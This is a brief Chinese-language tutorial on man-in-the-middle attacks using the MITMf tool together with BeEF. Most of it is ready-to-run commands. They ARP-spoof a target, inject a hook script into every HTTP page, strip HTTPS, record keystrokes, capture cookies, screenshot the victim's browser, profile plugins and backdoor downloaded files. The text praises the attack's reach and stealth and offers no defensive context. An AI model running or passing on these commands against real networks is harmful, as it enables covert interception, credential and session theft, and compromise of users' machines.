注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码,一旦得手影响范围巨大,如果中间人发生在运营商路线上,很难引起用户注意。
mitmf安装教程:https://github.com/byt3bl33d3r/MITMf/wiki/Installation
apt-get install mitmf
pip uninstall twisted
wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
tar -jvxf ./Twisted-15.5.0.tar.bz2
cd ./Twisted-15.5.0.tar.bz2
python setup.py install
beef结合mitmf进行跨站脚本注入攻击
启动beef
cd /usr/share/beef-xss/
./beef
mitmf中间人注入xss脚本
mitmf --spoof --arp -i eth0 --gateway <网关地址> --target <目标地址> --inject --js-url <hookURL>
到目标客户端打开浏览器访问bing网站时,打开源代码就会看到里面已经被插入了脚本攻击代码,而且已经被强制从https解密到http了。
可以仅仅利用mitmf的插件也能进行一些很强大的攻击,比如键盘记录器
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --jskeylogger
图片颠倒JOKE攻击
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --upsidedownternet
被攻击的目标图片就全都颠倒过来了
浏览器截屏,每十秒截屏一次,截屏图片存在/var/log/mitmf目录下
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --screen
抓取cookies,cookies存在/var/log/mitmf目录下
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --ferretng
浏览器插件信息获取
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --browserprofiler
凌空插后门
--filepwn